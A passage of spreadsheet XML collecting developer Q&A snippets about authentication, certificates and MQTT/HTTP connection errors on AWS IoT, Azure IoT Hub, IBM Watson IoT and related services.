    caPath: '../../certs/root-ca.pem.crt',
    clientId: name,
    region: 'ap-northeast-1'
});
app.subscribe('$aws/things/' + name + '/shadow/update/accepted');
app.on('message', function(topic, payload) {
    // THIS LINE OF CODE NEVER RUNS
    console.log('got message', topic, payload.toString());
});
Device.js:
var awsIot = require('aws-iot-device-sdk');
var name = 'THING_ID';
var device = awsIot.device({
    keyPath: '../../certs/private.pem.key',
    certPath: '../../certs/certificate.pem.crt',
    caPath: '../../certs/root-ca.pem.crt',
    clientId: name,
    region: 'ap-northeast-1'
});
device.subscribe('$aws/things/' + name + '/shadow/update/delta');
device.on('message', function (topic, payload) {
    console.log('got message', topic, payload.toString());
});
// Publish state.reported every 1 second with changing temp
setInterval(function () {
    device.publish('$aws/things/' + name + '/shadow/update', JSON.stringify({
        'state': {
            'reported': {
                'actual_pool_temp': 20 + Math.random() * 10
            }
        }
    }));
}, 1000);</t>
  </si>
  <si>
    <t>As a request header I'm using auth=('use-token-auth', 'MY-TOKEN')
so the entire code is:
import requests
response = requests.post('http://MY-ORG-ID.messaging.internetofthings.ibmcloud.com:1883/api/v0002/device/types/testdevice/devices/MY-DEVICE/events/test', data={'number': 1}, auth=('use-token-auth', 'MY-TOKEN'), headers={'Content-type': 'application/json'})
print(response.text) #TEXT/HTML
print(response.status_code, response.reason) #HTTP
What could be the reason for authentication failing?</t>
  </si>
  <si>
    <t>mqtt-token waitForCompletion)
      mqtt-client)))
(defn -main [] 
  (let [res (client/post (get data :api-url) (get data :request-conf))
        body (parse-string (get res :body) true)
        mqtt-data (first (get-in body [:extensions :subscription :mqttConnections]))
        {mqtt-url :url
         mqtt-client-id :client
         mqtt-topic  :topic} mqtt-data
        mqtt-client (mqtt-connect mqtt-topic mqtt-url  mqtt-client-id)]
     (.</t>
  </si>
  <si>
    <t>Details of this are present at:
https://docs.aws.amazon.com/iot/latest/developerguide/pub-sub-policy.html#pub-sub-policy-cognito
http://docs.aws.amazon.com/iot/latest/developerguide/authorization.html
Another Similar thread you might be interested in https://stackoverflow.com/a/47838529/962545</t>
  </si>
  <si>
    <t>Relevant code as follows:
When I use tls.cert.verify(true) I get the following output:
E:M 1472
E:M 1520
E:M 1520
HTTP client: Disconnected with error: 88
HTTP client: Connection timeout
HTTP request failed
Now let's try tls.cert.verify(false)
E:M 40
E:M 1520
E:M 1520
E:M 120
HTTP client: Disconnected with error: -123
HTTP client: Connection timeout
HTTP request failed
And try tls.cert.verify(false) again:
E:M 264
E:M 1520
E:M 1520
HTTP client: Disconnected with error: -16
HTTP client: Connection timeout
HTTP request failed
=== END EDITS ===
I do get that the HTTP library would make the code a bit neater, but at the moment I've already written the code without using it, and I haven't gone back and edited it yet to use the HTTP lib etc.</t>
  </si>
  <si>
    <t>body = "There was a detection from Pi"
sender_email = "example@gmail.com"
receiver_email = "example2@gmail.com"
password = "example"
# Create a multipart message and set headers
message = MIMEMultipart()
message["From"] = sender_email
message["To"] = receiver_email
message["Subject"] = subject
message["Bcc"] = receiver_email  # Recommended for mass emails
# Add body to email
message.attach(MIMEText(body, "plain"))
filename = "image.jpeg"  # In same directory as script
# Open PDF file in binary mode
with open(filename, "rb") as attachment:
    # Add file as application/octet-stream
    # Email client can usually download this automatically as attachment
    part = MIMEBase("application", "octet-stream")
    part.set_payload(attachment.read())
# Encode file in ASCII characters to send by email
encoders.encode_base64(part)
# Add header as key/value pair to attachment part
part.add_header(
    "Content-Disposition",
    f"attachment; filename= {filename}", # HERE IS THE INVALID SYNTAX ERROR
)
# Add attachment to message and convert message to string
message.attach(part)
text = message.as_string()
# Log in to server using secure context and send email
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
    server.login(sender_email, password)
    server.sendmail(sender_email, receiver_email, text)</t>
  </si>
  <si>
    <t>On running the above code, I get the successful authentication, but my 2nd request gives an error, "Not authenticated" 
OUTPUT
{'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked',
  'Set-Cookie': '_session_id=d888b2548fd6966490eef4b3657a1b342169;
  Expires=Sun, 08 May 2016 14:22:45 GMT; Path=/json', 'Server':
  'TwistedWeb/12.0.0', 'Date': 'Sun, 08 May 2016 13:22:45 GMT','Content-Type': 'application/x-json'} {"id": 1, "result": true,"error": null}
{'Transfer-Encoding': 'chunked', 'Date': 'Sun, 08 May 2016 13:22:45 GMT', 'Server': 'TwistedWeb/12.0.0', 'Content-Type':
  'application/x-json', 'Content-Encoding': 'gzip'} {"id": 2, "result":
  null, "error": {"message": "Not authenticated", "code": 1}}
If I run the 2nd request using curl, it works.</t>
  </si>
  <si>
    <t>HTTPClient http;
http.begin("http://192.168.2.10:8000/");
http.addHeader("User-Agent", "curl/7.26.0"); 
http.setAuthorization("username", "password");
auto httpCode = http.POST("/GPIO/11/value/0");
http.end();
@cagdas So I tried this next, still LED does not turn on
HTTPClient http;
http.begin("http://192.168.2.10:8000/");
http.addHeader("User-Agent", "curl/7.26.0"); 
http.POST("username=username&amp;password=password");
http.POST("/GPIO/11/value/0");
http.end();
and just to reiterate, this was the curl call I was trying to replicate:
curl -v -X POST -u username:password http://192.168.2.10:8000/GPIO/11/value/0</t>
  </si>
  <si>
    <t>As you did in the publishing process like this:
Also, you need set username and password:
At last, you can subscribe like this:
client.subscribe(topic=topic, qos=0)
Sample code for Security Keys authenticated device: 
import paho.mqtt.client as mqtt
import ssl, random
from time import sleep
path_to_root_cert = "./certs/digicertbaltimoreroot.cer"
iothub_name = "your hub name"
device_id = "device1"
sas_token = "SharedAccessSignature sr=[your hub name].azure-devices.net%2Fdevices%2Fdevice1&amp;sig=[sig]&amp;se=1526955728"
mqtt_url = "{}.azure-devices.net".format(iothub_name)
mqtt_port = 8883
topic = "devices/{}/messages/devicebound/#".format(device_id)
def error_str(rc):
    return "Some error occurred.</t>
  </si>
  <si>
    <t>Event Hub
Advantages
no code at all - all I need is enabling data capture
Disadvantages
one event hub per user - the only way of separating data inside ADLS through event hub's capture capability requires using one event hub per user
price - capturing one-event-hub-per-user increases the prices drastically
authorization - sending events are not as trivial as doing a POST
Functions + Event Hub
Using Event Hub with Functions mitigate Functions disadvantages, but have the same drawbacks (except auth) of Event Hub
Functions + Event Hub + Stream Analytics
Although I would be able to have a single event hub without capture, using Stream Analytics SQL as a filter to direct each user's data to its specific folder, it would be a limiting factor.</t>
  </si>
  <si>
    <t>Way-1 (Used .PFX as authentication)
Way-2 - Using SAS token :
public static void RegisterDeviceWithEnrollementGroup()
        {
            try
            {
                HttpClient client4 = new HttpClient();
            var sas = generateSasToken("XYZ.azure-devices-provisioning.net", "key", "provisioningserviceowner");
             client4.DefaultRequestHeaders.Add("Authorization", sas);
            client4.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
            client4.BaseAddress = new Uri("https://XYZ.azure-devices-provisioning.net/scopeid/registrations/device1/register?api-version=2018-11-01");
            string content = Newtonsoft.Json.JsonConvert.SerializeObject(null);
            var httpContent3 = new StringContent(content, Encoding.UTF8, "application/json");
            var pairs = new List&lt;KeyValuePair&lt;string, string&gt;&gt;
        {
            new KeyValuePair&lt;string, string&gt;("registrationId", "device1"),
            new KeyValuePair&lt;string, string&gt;("type", "x509"),
         };
            var content2 = new FormUrlEncodedContent(pairs);
            HttpResponseMessage response4 = client4.PutAsync(client4.BaseAddress.ToString(), content2).Result;
            var commandResult = string.Empty;
            if (response4.IsSuccessStatusCode)
            {
                commandResult = response4.Content.ReadAsStringAsync().Result;
            }
            else
            {
                commandResult = response4.Content.ReadAsStringAsync().Result;
            }
            Console.WriteLine("IoT hub API call result - " + commandResult);
        }
        catch (Exception)
        {
            throw;
        }
    }
Helper method :
 public static string generateSasToken(string resourceUri, string key, string policyName, int expiryInSeconds = 3600)
    {
        TimeSpan fromEpochStart = DateTime.UtcNow - new DateTime(1970, 1, 1);
        string expiry = Convert.ToString((int)fromEpochStart.TotalSeconds + expiryInSeconds);
        string stringToSign = WebUtility.UrlEncode(resourceUri) + "\n" + expiry;
        HMACSHA256 hmac = new HMACSHA256(Convert.FromBase64String(key));
        string signature = Convert.ToBase64String(hmac.ComputeHash(Encoding.UTF8.GetBytes(stringToSign)));
        string token = String.Format(CultureInfo.InvariantCulture, "SharedAccessSignature sr={0}&amp;sig={1}&amp;se={2}", WebUtility.UrlEncode(resourceUri), WebUtility.UrlEncode(signature), expiry);
        if (!String.IsNullOrEmpty(policyName))
        {
            token += "&amp;skn=" + policyName;
        }
        return token;
    }
Now Please answer some body whether I am doing correct or wrong here as I am getting exception.</t>
  </si>
  <si>
    <t>However, POST issue is still there:
FYI, the following is the response:
POST /configure.html HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Origin: http://192.168.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Redmi Note 3 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.123 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.0.1/index.html
Accept-Encoding: g
As could be seen, the packet received is partial, the Content-Length header says 43 byte payload.</t>
  </si>
  <si>
    <t>I am trying to send sensor data to the X509 ca signed device created in my iot-hub verified using the certificates generated following the below link:
https://github.com/Azure/azure-iot-sdk-c/blob/master/tools/CACertificates/CACertificateOverview.md
I have attached the created root certificate, device certificate and device key while sending the data as in the following code:
I am getting the output as:
I am using Paho to connect directly to azure iothub without using the azure-iothub-sdk.</t>
  </si>
  <si>
    <t>undefined
events.js:183
      throw er; // Unhandled 'error' event
      ^
Error: Connection refused: Not authorized
    at MqttClient._handleConnack (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/lib/client.js:896:15)
    at MqttClient._handlePacket (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/lib/client.js:332:12)
    at work (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/lib/client.js:274:12)
    at Writable.writable._write (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/lib/client.js:284:5)
    at doWrite (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/node_modules/readable-stream/lib/_stream_writable.js:428:64)
    at writeOrBuffer (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/node_modules/readable-stream/lib/_stream_writable.js:417:5)
    at Writable.write (&lt;PATH_TO_THE_JS_PROJECT&gt;/node_modules/mqtt/node_modules/readable-stream/lib/_stream_writable.js:334:11)
    at TLSSocket.ondata (_stream_readable.js:639:20)
    at emitOne (events.js:116:13)
    at TLSSocket.emit (events.js:211:7)</t>
  </si>
  <si>
    <t>Make sure the value of Authorization header is formed correctly including the signature.\r\nRequestId:c4892c5a-0002-003a-4992-493991000000\r\nTime:2016-01-07T21:30:36.1204037Z&lt;/Message&gt;\r\n  &lt;/Error&gt;\r\n  &lt;ExceptionInfo&gt;\r\n    &lt;Type&gt;StorageException&lt;/Type&gt;\r\n    &lt;HResult&gt;-2147467259&lt;/HResult&gt;\r\n    &lt;Message&gt;Cannot access a closed Stream.&lt;/Message&gt;\r\n    &lt;Source /&gt;\r\n    &lt;StackTrace /&gt;\r\n    &lt;InnerExceptionInfo&gt;\r\n      &lt;ExceptionInfo&gt;\r\n        &lt;Type&gt;ObjectDisposedException&lt;/Type&gt;\r\n        &lt;HResult&gt;-2146232798&lt;/HResult&gt;\r\n        &lt;Message&gt;Cannot access a closed Stream.&lt;/Message&gt;\r\n        &lt;Source&gt;mscorlib&lt;/Source&gt;\r\n        &lt;StackTrace&gt;   at System.IO.__Error.StreamIsClosed()\r\n   at System.IO.BufferedStream.ReadAsync(Byte[] buffer, Int32 offset, Int32 count, CancellationToken cancellationToken)\r\n   at System.Net.Http.DelegatingStream.ReadAsync(Byte[] buffer, Int32 offset, Int32 count, CancellationToken cancellationToken)\r\n   at Microsoft.WindowsAzure.Storage.Core.Util.StreamExtensions.&amp;lt;WriteToAsync&amp;gt;d__3`1.MoveNext()\r\n--- End of stack trace from previous location where exception was thrown ---\r\n   at System.Runtime.CompilerServices.TaskAwaiter.ThrowForNonSuccess(Task task)\r\n   at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)\r\n   at System.Runtime.CompilerServices.TaskAwaiter.ValidateEnd(Task task)\r\n   at Microsoft.WindowsAzure.Storage.Core.Executor.Executor.&amp;lt;ExecuteAsyncInternal&amp;gt;d__c`1.MoveNext()&lt;/StackTrace&gt;\r\n      &lt;/ExceptionInfo&gt;\r\n    &lt;/InnerExceptionInfo&gt;\r\n  &lt;/ExceptionInfo&gt;\r\n&lt;/RequestResult&gt;"}</t>
  </si>
  <si>
    <t>here are some steps to create the agent credentials for Bosch IoT Suite Permissions:
Purpose
Use a AuthorizedClient of Permissions to
activate Users without having them to do it themselves 
reduce the permissions of a user by creating agent-credentials with a subset of rights (to reduce the impact if credentials are abused)
Prerequisits
You have booked the IoT Permissions Service on bosch-iot-suite.com
You have created a User in the Permissions Service
Check out the Guide from Bosch IoT Permissions: https://permissions.s-apps.de1.bosch-iot-cloud.com/docs/developer-guide/index.html#Getting-started---Bosch-IoT-Suite_216542264
Guide
Create the Authentication Token with your desired user
Create the Authorization Token with that Authentication Token
(warning) You need to be careful to put the right scope into that Authorization Token (to activate users, use scope "pn")
Create the Agent Credentials with the Authorization Token
POST https://permissions-api.s-apps.de1.bosch-iot-cloud.com/2/rest/users/current/agent-credentials
Headers:
    x-im-client-access-token: &lt;....&gt;
    Authorization: Bearer &lt;authorization token&gt;
Body:
{
  "scopes": [ "pn" ]
}
Usage in Java implementation
Include Permission library into your application
Follow the guide from Bosch IoT Permissions
Create a Permissions client instance
     Permissions.createClientBuilder()
            .clientId(clientId)
            .clientSecret(clientSecret)
            .serviceUrl(serviceUrl)
            .build();
Create an authenticated Permissions client (be aware, that the authenticated Permissions client has an expiration date, so you need to recreate it from time to time)
    permissionsClient.authenticate()
            .agentCredentialsId(agentCredentialsId)
            .password(agentPassword)
            .andCreateAuthorizedClient()
            .executeAndGet()
            .getAuthorizedClient();</t>
  </si>
  <si>
    <t>Since i am new to OpenSSL i could not figure out what i am missing
I used the below command to create private key, CSR, and server certificate
openssl req -newkey rsa:2048 -new -nodes -keyout key.pem -out csr.pem
openssl x509 -req -days 365 -in csr.pem -signkey key.pem -out
  server.crt
If i upload csr.pem in AWS IoT console it accepts, but i could not use this file to connect MQTT.</t>
  </si>
  <si>
    <t>Once you have generated your Let's Encrypt certificates, they are located in /etc/letsencrypt/live/&lt;your domain name&gt;/
Copy the certificates
Gitlab expects two files located in /etc/gitlab/ssl/
There's something I'm not sure about, you may have to convert the .pem certificates using the answer at this location: Convert .pem to .crt and .key
Copy the certificate from /etc/letsencrypt/live/&lt;your domain name&gt;/cert.pem to /etc/gitlab/ssl/&lt;your domain name&gt;.crt
Copy the private key from /etc/letsencrypt/live/&lt;your domain name&gt;/privkey.pem to /etc/gitlab/ssl/&lt;your domain name&gt;.key
Reconfigure
Run gitlab-ctl reconfigure</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">@danvy is right you need to generate a SAS token,here is a signature generator https://github.com/sandrinodimattia/RedDog/releases 
There could be multiple ways to send events, you are using http, check out this sample
Check out this article for more details </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>http://fabriccontroller.net/iot-with-azure-service-bus-event-hubs-authenticating-and-sending-from-any-type-of-device-net-and-js-samples/</t>
    </r>
  </si>
  <si>
    <t>We are getting alert "Failed to join the conference call" and we are getting below error:
Error Domain=com.alamofire.error.serialization.response Code=-1011
  "Request failed: internal server error (500)"
  UserInfo={NSLocalizedDescription=Request failed: internal server error
  (500), com.matrixsdk.httpclient.error.response.data={ message =
  "Failed to authenticate user"; },
  NSErrorFailingURLKey=https://scalar-staging.riot.im/scalar/api/register?v=1.1,
  com.alamofire.serialization.response.error.data=&lt;7b226d65 73736167
  65223a22 4661696c 65642074 6f206175 7468656e 74696361 74652075
  73657222 7d&gt;,
  com.alamofire.serialization.response.error.response= { URL:
  https://scalar-staging.riot.im/scalar/api/register?v=1.1 } { Status
  Code: 500, Headers { "Access-Control-Allow-Origin" = ( "*" );
  "Content-Length" = ( 41 ); "Content-Type" = ( "application/json" );
  Date = ( "Mon, 17 Jun 2019 07:57:35 GMT" ); Server = ( cloudflare );
  "access-control-allow-headers" = ( "Origin, X-Requested-With,
  Content-Type, Accept, Authorization" ); "access-control-allow-methods"
  = ( "GET, POST, PUT, DELETE, OPTIONS" ); "cf-ray" = ( "4e83793a3ccdce27-LHR" ); "expect-ct" = ( "max-age=604800,
  report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\""
  ); } }}
Help would be appreciated.</t>
  </si>
  <si>
    <t>Registered device using Provisioning Device Client as follows:
Modified this IoT Device, myfirstchilddevice, on the portal to set the parent device as my edge device
Installed root CA Certificate on the edge device in Local Computer &gt; Trusted Root Certification Authorities
Trying to connect my downstream device to my IoT Edge gateway as follows:  
    var auth = new DeviceAuthenticationWithX509Certificate("myfirstchilddevice", new X509Certificate2(@"C:\Temp\GWCerts\certs\iot-device-myfirstchilddevice.cert.pfx"));
    DeviceClient deviceClient = DeviceClient.Create("myIotHub.azure-devices.net", "my-edgedevice", auth, TransportType.Amqp_Tcp_Only);
    await deviceClient.SendEventAsync(new Message(Encoding.UTF8.GetBytes("Test Message"))).ConfigureAwait(false);
I am getting exception for the SendEventAsync call, following is the exception:
Unhandled Exception: System.AggregateException: One or more errors occurred.</t>
  </si>
  <si>
    <t>I am working on browser script uploaded to EC2 to getThingShadow() using Federated Cognito credentials (Facebook login) but only get ForbiddenException: Forbidden
the login part was successful, i received credentials (non-empty) from AWS.WebIdentityCredentials()
The cognito ID was manually authorized using CLI (aws iot attach-principal-policy)
Cognito_Auth_Rule was allowing iot:* too
looks like i did everything as per manual, still cannot get iotData
http://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/IotData.html
Please advise, really appreciate any comments
Thanks
Nick
My IAM Policy attached to Cognito_Auth_Rule is:
get credentials 
my code
        var params = {
            thingName: 'thingName' /* required */
        };
        iotdata.getThingShadow(params, function (err, data) {
            if (err) {
                console.log(err, err.stack); // an error occurred
                iotResults.innerHTML = err;
            } else {
                console.log(data);           // successful response
                iotResults.innerHTML = data;
            }
        });
error message from console:
Error: Forbidden
    at Object.s [as extractError] (aws-sdk-2.7.20.min.js:37)
    at constructor.i (aws-sdk-2.7.20.min.js:37)
    at constructor.callListeners (aws-sdk-2.7.20.min.js:38)
    at constructor.emit (aws-sdk-2.7.20.min.js:38)
    at constructor.emitEvent (aws-sdk-2.7.20.min.js:37)
    at constructor.e (aws-sdk-2.7.20.min.js:37)
    at a.runTo (aws-sdk-2.7.20.min.js:39)
    at aws-sdk-2.7.20.min.js:39
    at constructor.&lt;anonymous&gt; (aws-sdk-2.7.20.min.js:37)
    at constructor.&lt;anonymous&gt; (aws-sdk-2.7.20.min.js:37) "ForbiddenException: Forbidden
    at Object.s [as extractError] (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:9704)
    at constructor.i (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:14284)
    at constructor.callListeners (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:38:4687)
    at constructor.emit (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:38:4396)
    at constructor.emitEvent (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:23801)
    at constructor.e (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:19651)
    at a.runTo (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:39:11367)
    at https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:39:11574
    at constructor.&lt;anonymous&gt; (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:19861)
    at constructor.&lt;anonymous&gt; (https://sdk.amazonaws.com/js/aws-sdk-2.7.20.min.js:37:23856)"</t>
  </si>
  <si>
    <t>See also
Python
http://wiki.python.org/moin/SandboxedPython
tav CPython patches:
http://codereview.appspot.com/20051
http://codereview.appspot.com/21043
secure*.py in plexnet
http://github.com/tav/plexnet/tree/master/source/plexnet/util
Security in Python Wiki:
http://wiki.python.org/moin/Security
safelite.py:
http://tav.espians.com/a-challenge-to-break-python-security.html
Zope security:
http://pypi.python.org/pypi/RestrictedPython
http://svn.zope.org/zope.security/trunk/src/zope/security/
Python taint mode:
http://www.cats-muvva.net/software/
Controlling Access to Resources Within The Python Interpreter:
http://www.cs.ubc.ca/~drifty/papers/python_security.pdf
PyPy sandbox:
http://codespeak.net/pypy/dist/pypy/doc/sandbox.html
mxProxy:
http://www.egenix.com/products/python/mxBase/mxProxy/
Python 2.3: rexec and Bastion
Python-dev mailing list
"Python jail: whitelist vs blacklist"
Victor Stinner, Tue Feb 24 13:50:40 CET 2009
http://mail.python.org/pipermail/python-dev/2009-February/086444.html
"Challenge: Please break this!"</t>
  </si>
  <si>
    <t>HTTPS sites are not opening
Error : SSL connection error
please find the logs and config sample
Iptables
Squid
Squid Log
1438333207.745      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html
1438333207.749      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html
1438333207.753      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html
1438333207.789      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html
1438333207.803      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html
1438333210.190      1 192.168.0.10 NONE/400 4000 NONE error:invalid-request - NONE/- text/html</t>
  </si>
  <si>
    <t>all you need to do is generate and APIKey/Token like in:
https://console.bluemix.net/docs/services/IoT/platform_authorization.html#connecting-applications
then, to receive the messages, you need to subscribe to a topic as in 
iot-2/type/device_type/id/device_id/cmd/command_id/fmt/format_string
In your case:
iot-2/type/Android/id/samsung/cmd/temperature/fmt/json
Details on publishing and subscribing are here:
https://console.bluemix.net/docs/services/IoT/applications/mqtt.html#mqtt</t>
  </si>
  <si>
    <t>2018-12-20 00:42:53,574 ERROR --- BrokerConnectService           : Not authorized to connect
EDIT:
I created a CA certificate from https://github.com/Azure/azure-iot-sdk-c/blob/master/certs/certs.c as CACert.cer  
I selected CS Certificate file option in SSL/TLS option and tried again.</t>
  </si>
  <si>
    <t>I have utilized the following class &amp; SH files from this page:
http://changingjasper.blogspot.co.uk/2014/06/making-jasper-use-at-speech-api.html
here is my python file:
the class file is the following, (I have removed my credentials for security reasons):
the sh files which contain the curl are as follows:
getToken.sh 
#!/bin/bash
curl "https://api.att.com/oauth/token" \
    --header "Content-Type: application/x-www-form-urlencoded" \
    --header "Accept: application/json" \
    --data "client_id=$1&amp;client_secret=$2&amp;scope=SPEECH&amp;grant_type=client_credentials" \
    --request POST
getResults.sh
#!/bin/sh
curl "https://api.att.com/speech/v3/speechToText"  \
        --header "Authorization: Bearer $1" \
        --header "Accept: application/json" \
        --header "Content-Type: audio/wav" \
        --data-binary @$2 \
        --request POST
I recieve the following error:
ERRORHTTPCODE500
HTTPRESPONSEMESSAGEINTERNAL SERVER ERROR
ERRORTYPESPEECHENGINEEXCEPTION
ERRORMESSAGEIOEXCEPTION OCCURRED WHILE CALLING WATSON ASR SERVICE.</t>
  </si>
  <si>
    <t>However, when I try to, I get the following error:
SEND OK HTTP/1.1 400 Bad Request Server: nginx Date: Mon, 27 May 2019
  22:34:09 GMT Content-Type: text/html Content-Length: 166 Connection:
  close Strict-Transport-Security: max-age=31556926; includeSubDomains;
  preload
 400 Bad Request  400 Bad Request
nginx  
  CLOSED
The AT commands I issue are:
AT+QIOPEN="TCP", "drone-polution.firebaseio.com", 443 
  OK 
CONNECT OK
AT+QISEND
&gt;
POST /NewDB/.json 
Accept: application/json 
Content-Type: application/json
Content-Length: 9 
{"a":"b"}
The last line is the actual payload.</t>
  </si>
  <si>
    <t>In short, I am trying to have my middleware "impersonate" any of the devices on the hub, over a single TLS connection, using the "device connect" access policy key, through a Transparent IoT Edge Gateway, however I see no place to specify the gatewayHostName parameter on a SharedAccessSignature or find a way to find and configure IoT hub-level shared access policies on a IoT Edge hub.</t>
  </si>
  <si>
    <t>I tried to create certificates myself, using createKeysAndCertificate() from AWS SDK, saving them to disk, attaching a policy manually, attaching a principal manually even tried to mark certificate as "active" manually, something along these lines:
iot.createThing({ thingName: deviceID }, (err, d) =&gt; {
  if (err) {
    console.log(err);
  } else {
    allThings[d.thingName] = d;
    iot.createKeysAndCertificate({ setAsActive: true }, (e, c) =&gt; {
      if (e) {
        console.log(e);
      } else {
        fs.writeFile(`certs/${deviceID}.pem`, c.certificatePem, (ef, f) =&gt; {
          if (ef) throw ef;
        });
        fs.writeFile(`certs/${deviceID}.key`, c.keyPair.PrivateKey, (ef, f) =&gt; {
          if (ef) throw ef;
        });
        iot.attachPrincipalPolicy({
          policyName: 'my-testing-policy',
          principal: c.certificateArn,
        }, (ee, cc) =&gt; {
          if (ee) {
            console.log(ee);
          } else {
            iot.attachThingPrincipal({
              principal: c.certificateArn,
              thingName: deviceID,
            }, (prerr, prdata) =&gt; {
              if (prerr) {
                console.log(prerr);
              } else {
                iot.acceptCertificateTransfer({
                  certificateId: c.certificateId,
                  setAsActive: true,
                }, (ce, cd) =&gt; {
                  if (err) {
                    console.log(err);
                  } else {
                    console.log('cert activated.</t>
  </si>
  <si>
    <t>(https://github.com/Azure/amqpnetlite/blob/master/docs/articles/service_to_iothub.md)
Generating SAS tokens on every request is redundant and I would like to use the shared access policy and key as user and password when connecting to IoT Hub.</t>
  </si>
  <si>
    <t>key=fZC4GAPSVxMrBVrG9HvQgGfg7Rsa
Response Body 
{
  "this": "failed",
  "because": "the key you provided doesn't work with this thing"
}
Response Code
200
Response Headers
{
  "Access-Control-Allow-Origin": "*",
  "Date": "Thu, 23 Mar 2017 09:09:45 GMT",
  "Content-Encoding": "gzip",
  "Connection": "keep-alive",
  "Transfer-Encoding": "chunked",
  "Content-Type": "application/json"
}</t>
  </si>
  <si>
    <t>--&gt; I am not able to create the header (authentication for the access)
with:
2.
uri = '{sb_name}.servicebus.windows.net/{eh_name}/consumergroups'
header = { 'Authorization':get_auth_token(sb_name, eh_name, 'iothubowner', sas_value), 'Content-Type':'application/json' }
res = get(uri, headers=header) # this works (list of consumerGroups)
but:
uri = '{sb_name}.servicebus.windows.net/{eh_name}/consumergroups/newConsumerGroup'
res = put(uri, headers=header)
does not work:
401 40100: Unauthorized : Unauthorized access for 'CreateOrUpdateConsumerGroup' operation on endpoint 'sb://{sb_name}.servicebus.windows.net/{eh_name}/consumergroups/newConsumerGroup'.</t>
  </si>
  <si>
    <t>The error message I get is this:
AWSIoTPythonSDK.exception.AWSIoTExceptions.connectTimeoutException
I also read somewhere that there may be other policies that somehow have to be attached:
"According to the Policies for HTTP and WebSocketClients documentation, in order to authenticate an Amazon Cognito identity to publish MQTT messages over HTTP, you must specify two policies.</t>
  </si>
  <si>
    <t>The mosquito command is not complete, you need to specify the port 8883, and the connection is secure by default and you need to specify the server certificate that can be downloaded from below:
https://github.com/ibm-watson-iot/iot-python/blob/master/src/ibmiotf/messaging.pem
So the command should look like:
mosquitto_pub -h xwc8vm.messaging.internetofthings.ibmcloud.com -p 8883 -u "use-token-auth" -P "xxxxxxxxx" -i "d:xwc8vm:device-type:my-device" -t "iot-2/evt/x/fmt/json" -m {"d":"hello"} --cafile messaging.pem -d
messaging.pem file needs to be in the same location as mosquitto_pub file or you can pass the path to it
Note: Please mind the topic format:
"iot-2/evt/x/fmt/json" &gt;&gt;&gt;&gt;&gt; iot-2/evt/event/fmt/event_format
Very important, please edit your post and remove or mask the authentication token</t>
  </si>
  <si>
    <t>Arduino Code
Python Code
import time
import serial
from twilio.rest import Client
arduinoserial = serial.Serial('COM3', 9600)
time.sleep(2)
account_sid = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
auth_token  = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
client = Client(account_sid, auth_token)
while True:
        if arduinoserial.read('a'):
            print(arduinoserial.readline().str())
            messageTosend="TURN ON LAMP"
            message = client.messages.create(
                                body=messageTosend,
                                from_='+14xxxxxxx',
                                to='+14xxxxxxxx'
                        )
        if arduinoserial.read(int('b')):
            print(arduinoserial.readline().str())
            messageTosend = "TURN OFF LAMP"
            message = client.messages.create(
                body=messageTosend,
                from_='+14xxxxxxxxxxxx',
                to='+14xxxxxxxxxxxxxxx'
            )
time.sleep(1)
print(message.sid)
arduinoserial.close()</t>
  </si>
  <si>
    <t>I've created a test certificate with the code found here https://github.com/Azure/azure-iot-sdk-csharp/tree/master/provisioning/device/samples/ProvisioningDeviceClientX509
This created a certificate.</t>
  </si>
  <si>
    <t>import paho.mqtt.client as mqtt
import ssl, random
from time import sleep
root_ca = "./certs/digicertbaltimoreroot.cer"
public_crt = './certs/mydevice-public.pem'
private_key = './certs/mydevice-private.pem'
iothub_name = "your hub name"
device_id = "mydevice"
mqtt_url = "{}.azure-devices.net".format(iothub_name)
mqtt_port = 8883
topic = "devices/{}/messages/devicebound/#".format(device_id)
def error_str(rc):
    return "Some error occurred.</t>
  </si>
  <si>
    <t>For publishing messages using MQTT, you would need to generate a SAS token for the downstream device and then use it to communicate with iot hub (edge device would act as a transparent gateway).</t>
  </si>
  <si>
    <t>The section of the docs that talks about needing to attach the IoT policy can be found on this page:
